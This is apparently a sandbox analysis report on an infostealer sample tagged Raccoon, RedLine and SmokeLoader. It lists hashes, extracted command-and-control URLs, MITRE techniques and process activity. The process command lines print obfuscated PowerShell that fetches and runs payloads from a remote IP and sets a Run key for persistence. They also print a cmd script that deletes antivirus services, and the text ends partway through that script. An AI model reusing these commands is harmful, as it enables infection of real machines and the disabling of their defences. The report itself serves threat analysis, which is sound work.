raccoon | c8dc6ed0d081d67f6b686a19ca7f5e211eb502dec5b287cd85b6a37035f20bd7

Analysis

max time kernel
151s
max time network
144s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 06:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

762a6aad9e19cfdc94653d3cdf7ad24c.exe
Size

310KB
MD5

762a6aad9e19cfdc94653d3cdf7ad24c
SHA1

a7c10d06cad6498c5a525ee6ec4565439a55ca34
SHA256

c8dc6ed0d081d67f6b686a19ca7f5e211eb502dec5b287cd85b6a37035f20bd7
SHA512

11b05afe0aa9c9b4383458f29b39a178a25320991fd5ba7df1dccec205fe1ca7c228ca5faa688abc65c5e1c3e4aed15147aa01108e6b7cb154f1f0ab5bc8613f

Score

10^/10

raccoon redline smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3908-188-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/3908-191-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/3908-202-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/496-231-0x00000000048A0000-0x0000000004931000-memory.dmp	family_raccoon
behavioral2/memory/496-243-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 2080 created 496 2080 WerFault.exe 2F42.exe
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

201 3996 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

CFC9.exeD1FC.exeD420.exeD951.exeRuntimebroker.exeD420.exe2F42.exe

pid process

3252 CFC9.exe
3412 D1FC.exe
3732 D420.exe
1192 D951.exe
784 Runtimebroker.exe
3908 D420.exe
496 2F42.exe

description	pid	process	target process
PID 2080 created 496	2080	WerFault.exe	2F42.exe

flow	pid	process
201	3996	powershell.exe

pid	process
3252	CFC9.exe
3412	D1FC.exe
3732	D420.exe
1192	D951.exe
784	Runtimebroker.exe
3908	D420.exe
496	2F42.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

D951.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	D951.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	D951.exe

Deletes itself 1 IoCs

Processes:

pid process

2832

pid	process
2832

Drops startup file 3 IoCs

Processes:

cmd.exeRuntimebroker.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

Loads dropped DLL 1 IoCs

Processes:

D420.exe

pid process

3908 D420.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3908	D420.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\D951.exe	themida
C:\Users\Admin\AppData\Local\Temp\D951.exe	themida
behavioral2/memory/1192-139-0x0000000000BB0000-0x0000000000BB1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

D951.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D951.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

D951.exe

pid process

1192 D951.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	D951.exe

pid	process
1192	D951.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

762a6aad9e19cfdc94653d3cdf7ad24c.exeD420.exe

description	pid	process	target process
PID 3988 set thread context of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3732 set thread context of 3908	3732	D420.exe	D420.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2100	3252	WerFault.exe	CFC9.exe
2080	3252	WerFault.exe	CFC9.exe
2756	3252	WerFault.exe	CFC9.exe
2484	3252	WerFault.exe	CFC9.exe
2040	3252	WerFault.exe	CFC9.exe
1944	3252	WerFault.exe	CFC9.exe
1144	784	WerFault.exe	Runtimebroker.exe
192	784	WerFault.exe	Runtimebroker.exe
496	784	WerFault.exe	Runtimebroker.exe
3788	784	WerFault.exe	Runtimebroker.exe
1584	784	WerFault.exe	Runtimebroker.exe
3448	784	WerFault.exe	Runtimebroker.exe
2176	3908	WerFault.exe	D420.exe
2500	496	WerFault.exe	2F42.exe
4064	496	WerFault.exe	2F42.exe
4060	496	WerFault.exe	2F42.exe
2492	496	WerFault.exe	2F42.exe
2080	496	WerFault.exe	2F42.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

762a6aad9e19cfdc94653d3cdf7ad24c.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	762a6aad9e19cfdc94653d3cdf7ad24c.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	762a6aad9e19cfdc94653d3cdf7ad24c.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	762a6aad9e19cfdc94653d3cdf7ad24c.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

762a6aad9e19cfdc94653d3cdf7ad24c.exe

pid	process
2440	762a6aad9e19cfdc94653d3cdf7ad24c.exe
2440	762a6aad9e19cfdc94653d3cdf7ad24c.exe
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2832
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

762a6aad9e19cfdc94653d3cdf7ad24c.exe

pid process

2440 762a6aad9e19cfdc94653d3cdf7ad24c.exe
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832
2832

pid	process
2832

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeD951.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exeD420.exepowershell.exeWerFault.exepowershell.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exe

description	pid	process
Token: SeRestorePrivilege	2100	WerFault.exe
Token: SeBackupPrivilege	2100	WerFault.exe
Token: SeDebugPrivilege	2100	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	2080	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	2756	WerFault.exe
Token: SeDebugPrivilege	2484	WerFault.exe
Token: SeDebugPrivilege	2040	WerFault.exe
Token: SeDebugPrivilege	1192	D951.exe
Token: SeDebugPrivilege	1944	WerFault.exe
Token: SeDebugPrivilege	1144	WerFault.exe
Token: SeDebugPrivilege	192	WerFault.exe
Token: SeDebugPrivilege	496	WerFault.exe
Token: SeDebugPrivilege	3788	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	1584	WerFault.exe
Token: SeDebugPrivilege	1340	powershell.exe
Token: SeDebugPrivilege	3732	D420.exe
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	2176	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	4020	powershell.exe
Token: SeDebugPrivilege	2500	WerFault.exe
Token: SeDebugPrivilege	4064	WerFault.exe
Token: SeDebugPrivilege	4060	cmd.exe
Token: SeDebugPrivilege	2492	WerFault.exe
Token: SeDebugPrivilege	2080	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2832

pid	process
2832

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

762a6aad9e19cfdc94653d3cdf7ad24c.exeCFC9.exeD1FC.exeRuntimebroker.exeD420.exepowershell.exe

description	pid	process	target process
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 3988 wrote to memory of 2440	3988	762a6aad9e19cfdc94653d3cdf7ad24c.exe	762a6aad9e19cfdc94653d3cdf7ad24c.exe
PID 2832 wrote to memory of 3252	2832		CFC9.exe
PID 2832 wrote to memory of 3252	2832		CFC9.exe
PID 2832 wrote to memory of 3252	2832		CFC9.exe
PID 2832 wrote to memory of 3412	2832		D1FC.exe
PID 2832 wrote to memory of 3412	2832		D1FC.exe
PID 2832 wrote to memory of 3412	2832		D1FC.exe
PID 2832 wrote to memory of 3732	2832		D420.exe
PID 2832 wrote to memory of 3732	2832		D420.exe
PID 2832 wrote to memory of 3732	2832		D420.exe
PID 2832 wrote to memory of 1192	2832		D951.exe
PID 2832 wrote to memory of 1192	2832		D951.exe
PID 2832 wrote to memory of 1192	2832		D951.exe
PID 3252 wrote to memory of 784	3252	CFC9.exe	Runtimebroker.exe
PID 3252 wrote to memory of 784	3252	CFC9.exe	Runtimebroker.exe
PID 3252 wrote to memory of 784	3252	CFC9.exe	Runtimebroker.exe
PID 3412 wrote to memory of 3132	3412	D1FC.exe	cmd.exe
PID 3412 wrote to memory of 3132	3412	D1FC.exe	cmd.exe
PID 3412 wrote to memory of 3132	3412	D1FC.exe	cmd.exe
PID 784 wrote to memory of 1340	784	Runtimebroker.exe	powershell.exe
PID 784 wrote to memory of 1340	784	Runtimebroker.exe	powershell.exe
PID 784 wrote to memory of 1340	784	Runtimebroker.exe	powershell.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 3732 wrote to memory of 3908	3732	D420.exe	D420.exe
PID 784 wrote to memory of 3996	784	Runtimebroker.exe	powershell.exe
PID 784 wrote to memory of 3996	784	Runtimebroker.exe	powershell.exe
PID 784 wrote to memory of 3996	784	Runtimebroker.exe	powershell.exe
PID 2832 wrote to memory of 496	2832		2F42.exe
PID 2832 wrote to memory of 496	2832		2F42.exe
PID 2832 wrote to memory of 496	2832		2F42.exe
PID 2832 wrote to memory of 3540	2832		explorer.exe
PID 2832 wrote to memory of 3540	2832		explorer.exe
PID 2832 wrote to memory of 3540	2832		explorer.exe
PID 2832 wrote to memory of 3540	2832		explorer.exe
PID 3996 wrote to memory of 4020	3996	powershell.exe	powershell.exe
PID 3996 wrote to memory of 4020	3996	powershell.exe	powershell.exe
PID 3996 wrote to memory of 4020	3996	powershell.exe	powershell.exe
PID 2832 wrote to memory of 2040	2832		explorer.exe
PID 2832 wrote to memory of 2040	2832		explorer.exe
PID 2832 wrote to memory of 2040	2832		explorer.exe
PID 2832 wrote to memory of 420	2832		explorer.exe
PID 2832 wrote to memory of 420	2832		explorer.exe
PID 2832 wrote to memory of 420	2832		explorer.exe
PID 2832 wrote to memory of 420	2832		explorer.exe
PID 2832 wrote to memory of 3936	2832		explorer.exe
PID 2832 wrote to memory of 3936	2832		explorer.exe
PID 2832 wrote to memory of 3936	2832		explorer.exe
PID 2832 wrote to memory of 2428	2832		explorer.exe
PID 2832 wrote to memory of 2428	2832		explorer.exe
PID 2832 wrote to memory of 2428	2832		explorer.exe
PID 2832 wrote to memory of 2428	2832		explorer.exe
PID 2832 wrote to memory of 1624	2832		explorer.exe

C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe
"C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3988

C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe
"C:\Users\Admin\AppData\Local\Temp\762a6aad9e19cfdc94653d3cdf7ad24c.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2440

C:\Users\Admin\AppData\Local\Temp\CFC9.exe
C:\Users\Admin\AppData\Local\Temp\CFC9.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 868
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 880
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 920
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 888
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 956
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 880
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 732
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 784
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 760
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 796
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 976
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 784 -s 1040
3⤵
- Program crash
PID:3448

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add 